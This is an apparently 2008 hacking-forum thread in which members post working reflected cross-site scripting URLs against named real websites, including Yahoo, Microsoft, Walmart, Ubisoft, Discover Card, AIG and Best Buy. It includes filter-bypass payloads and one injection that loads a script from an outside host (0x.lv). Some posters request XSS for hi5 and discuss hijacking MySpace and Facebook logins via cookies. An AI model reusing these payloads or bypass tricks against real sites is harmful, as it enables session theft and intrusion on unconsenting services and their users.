removed by request

http://www.xssed.com/archive/author=PaPPy/



Edited 3 time(s). Last edit at 11/07/2008 07:01PM by PaPPy.

Im presuming its vunrable to SQL injection too, just havent got the time to play with it at the moment.

http://www.ellis-brigham.com/cgi-bin/psProdSrch.cgi?mode=user&orderBy=relevance&searchScope=shop&search_text=dd%22%3E%3CScript%3Ealert%28111%29%3B%3C%2Fscript%3E&Button=go

http://cf.yp.yahoo.com/about/createfeedback.html?stype=&what=&where=&ucas=%22%3E%3Cscript%3Ealert(1)%3C/script%3E

I don't know why but it doesn't work all the time.

And

http://pix2.search.mud.yahoo.com/index.php?search=%25C0%2522%2520onmouseover%3Dalert(%2Fxss%2F.source)%2520\&x=0&y=0

Put your mouse over the search box.

http://www.rstcenter.com - Romanian Security Team
Inchirieri limuzine



Edited 2 time(s). Last edit at 11/10/2008 09:05AM by nemessis.

More pXSS

http://interweb.wikispaces.com/search/view/%3Cscript%3Ealert(%27x%27)%3C%2Fscript%3E+

doesn't seem to work on the main page search only when you search from a username.wikispaces.com ;\

http://cutelayouts.org/Orkut_images/orkut_images.asp?cat=%3Cscript%3Edocument.getElementById(%27wrapper%27).innerHTML=%27%3Cp%3Eqwerty%3C/p%3E%27;%3C/script%3E

probably a better way to do this

skpx Wrote:
-------------------------------------------------------
> http://cutelayouts.org/Orkut_images/orkut_images.a
> sp?cat=%3Cscript%3Edocument.getElementById(%27wrap
> per%27).innerHTML=%27%3Cp%3Eqwerty%3C/p%3E%27;%3C/
> script%3E
>
> probably a better way to do this

ya just doing an end title </title>

http://www.xssed.com/archive/author=PaPPy/

Oh my: http://www.microsoft.com.mk/Default.aspx?tabindex=0&tabid=47&search=<img/src/onerror=alert(/XSS/.source)>

---------------------------------------------------------------------------------
[[url=http://voodoo-labs.org]Voodoo Research Group[/url]]
[[url=http://foro.undersecurity.net/]US.net forum[/url]]

http://www.walmart.com/search/search-ng.do%3Fsearch_constraint%3D0%26ic%3D48_0%26search_query%3D%27%20onmouseover%3D%27alert%281%29%3B%26Find.x%3D0%26Find.y%3D0%26Find%3DFind

Sorry wally world

http://www.xssed.com/archive/author=PaPPy/

can i has farcry 2 plz?
http://farcry.uk.ubi.com/index.php?page=%00%3C/script%3E%3Cscript%3Ealert%281%29%3B%3C/script%3E
http://farcry.us.ubi.com/index.php?page=%00%3C/script%3E%3Cscript%3Ealert%281%29%3B%3C/script%3E
http://farcry.de.ubi.com/?page=%00%3C/script%3E%3Cscript%3Ealert%281%29%3B%3C/script%3E
http://farcry.fr.ubi.com/?page=%00%3C/script%3E%3Cscript%3Ealert%281%29%3B%3C/script%3E
http://farcry.it.ubi.com/?page=%00%3C/script%3E%3Cscript%3Ealert%281%29%3B%3C/script%3E
http://farcry.es.ubi.com/?page=%00%3C/script%3E%3Cscript%3Ealert%281%29%3B%3C/script%3E

http://www.xssed.com/archive/author=PaPPy/

http://shop.starwars.com/catalog/product.xml?product_id=1223186;category_id=100750&rid=SWHP3PROD%27,%22%22),$=alert,_=%22XSS%22,$(_)//

I had to bypass something like this (;|[a-zA-Z0-9]+\(.*\))+

PS: Upss! It's McAfee SECURE!

---------------------------------------------------------------------------------
[[url=http://voodoo-labs.org]Voodoo Research Group[/url]]
[[url=http://foro.undersecurity.net/]US.net forum[/url]]



Edited 1 time(s). Last edit at 12/10/2008 01:28PM by C1c4Tr1Z.

http://anonym.to/javascript%3Aalert%28%27xss%27%29//http%3A//%20

-tx @ lowtech-labs.org

is there any xss for hi5 ?

No, but if you order now, you can get 2 XSS for myspace and 1 for facebook.

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

but wait there's more! if you call with in the next 5 minutes you get a tube of mighty putty!

http://www.xssed.com/archive/author=PaPPy/

myspace and facebook xss doesnt work. can't login by the cookies...

i m looking for hi5

http://w2.hidemyass.com/index.php?q=aHR0cDovL3d3dy5nb29nbGUuY29tLmFyLz9xPVwiIG9ubW91c2VvdmVyPWFsZXJ0KC9DMWM0VHIxWi8uc291cmNlKT4=

---------------------------------------------------------------------------------
[[url=http://voodoo-labs.org]Voodoo Research Group[/url]]
[[url=http://foro.undersecurity.net/]US.net forum[/url]]

@tj: as soon as you understood this - you might wanna try to master that. Then come back here.

hahaha funny :|

It wasn't meant to be funny. Check what this thread and this whole forum is about and then check if that matches with your posts.

http://www.truste.org/ivalidate.php?url=http://www.verisign.com/&sealid=101" onmouseover=alert('XSS') "

We love sarcasm.

---------------------------------------------------------------------------------
[[url=http://voodoo-labs.org]Voodoo Research Group[/url]]
[[url=http://foro.undersecurity.net/]US.net forum[/url]]

Eclipse BIRT reflected XSS (all versions)

XSS will be fixed in milestone 2.5.0 ahaha

see my blog

http://antisnatchor.com/2008/12/18/eclipse-birt-reflected-xss/

Have fun

+++eat, fuck, hack+++

Talking about Eclipse...

http://localhost:8000/%22%3E%3Cscript%20src=//0x.lv%3E%3C/script%3E

ihihihih...nice mariuzzo :)
-------------------------------------------------------
> Talking about Eclipse...
>
> http://localhost:8000/%22%3E%3Cscript%20src=//0x.l
> v%3E%3C/script%3E

+++eat, fuck, hack+++

http://www.boyhitscar.com/bhcgallery/Northeast%20Tour%202007.html?page=<script>alert(1)</script>

Love this band :D

https://www.discovercard.com/cardmembersvcs/acqs/app/exec?bizNameInput=%22%3E%3Cscript%3Ealert(1234)%3C%2Fscript%3E&bizNameOnCardInput=&legalEntityInput=&bizIndustryInput=&employerIdNumberInput1=&employerIdNumberInput2=&yearInBizInput=&businessStreetAddress1Input=&businessStreetAddress2Input=&businessCityInput=&businessStateInput=&businessZipInput=&firstNameInput=&middleNameInput=&lastNameInput=&suffixInput=&homePhoneAreaCode=&homePhonePrefix=&homePhoneSuffix=&emailInput=&homeStreetAddress1Input=&homeStreetAddress2Input=&homeCityInput=&homeStateInput=&homeZipInput=&ssnInput1=&ssnInput2=&ssnInput3=&dobMonthInput=&dobDayInput=&dobYearInput=&annualHouseholdIncomeInput=&housingStatusInput=&businessStreetAddress1Hidden=&businessStreetAddress2Hidden=&businessCityHidden=&businessStateHidden=&businessZipHidden=&authBuyerFirstNameInput=&authBuyerMiddleInitialInput=&authBuyerLastNameInput=&btCheckboxInput=&dynaviewSubmit.%2Fbody%2FformArea%2FsubmitButton.x=97&dynaviewSubmit.%2Fbody%2FformArea%2FsubmitButton.y=2&dynaviewSubmit.%2Fbody%2FformArea%2FsubmitButton=Continue&aid=&pid=&sid=&iq_id=&dynaviewFromComponent=home&dynaviewMain=BIZP
By the looks of it every field is vuln to XSS.

http://www.aig.com/searchresults/search-results_20_17047.html?reqPageNum=1&reqEndPageListing=&qp_CountryCode=US&qp_LanguageCode=en&querySuggestSpellingOption=false&searchHighlightPrefix=searchTerm&queryHighlightOption=true&qt=%22%3E%3Cscript%3Ealert(%27We+got+no+moneis+%3Do(%27)%3C%2Fscript%3E =o(

http://www.bushbeans.com/jaysjournal/journalsubmit.php?promotionid=3&source=none&firstname=%22%3E%3Cscript%3Ealert(/beans/)%3C/script%3E&lastname=aaaa&email=affads%40mail.com&address1=&address2=&city=&state=&zip=11111&phone=&gender=F&Month=12&Day=1&Year=1111&emailformat=Text&oftenconsume=

Some MS XSSs...

http://www.microsoft.com/canada/athome/security/redirect.aspx?url=%22;alert(/CM/);// looks like they thought of 'security' when making the URL but didn't follow through on it.

http://www.microsoft.com/italy/pmi/voip/voip.aspx?url=javascript:alert(/CM/)

http://sport.ch.msn.com/scripts/tellafriend/tellafriend.php?url=%22%3E%3Cscript%3Ealert(/CM/)%3C/script%3E

Hi guys! This is my first post :) The truth is, this XSS found me. :)

EthicalHacker.net

www.ethicalhacker.net/XSS%22onload=%22alert(document.domain)

jojo! nice magicmac.

MAD got xssed: http://www.dccomics.com/mad/popup_marginal.php?m=weather_shop_talk%22;alert(/XSS/.source);%22

---------------------------------------------------------------------------------
[[url=http://voodoo-labs.org]Voodoo Research Group[/url]]
[[url=http://foro.undersecurity.net/]US.net forum[/url]]

http://www.bestbuy.com/site/olspage.jsp?id=cat13506&type=page&skuId=9171709&productId=1218043585577&largeimgurl=/images/screenshots/9171/9171709_pcHomel_006_ss.jpg%22%20onmouseover%3D%22alert(1);&caption=PaPPy%20was%20here!&count=5&total=6

and this one
http://www.lego.com/legostores/features.asp?x=x&store=test<script>alert(1);</script>&cCode=3

also came across this one on mozilla
https://developer.mozilla.org/devnews/index.php/2008/12/18/firefox-20020-now-available-for-download2%22%3E%3C/a%3E%3Cscript%3Ealert(1);%3C/script%3E

http://www.xssed.com/archive/author=PaPPy/



Edited 2 time(s). Last edit at 01/02/2009 12:43PM by PaPPy.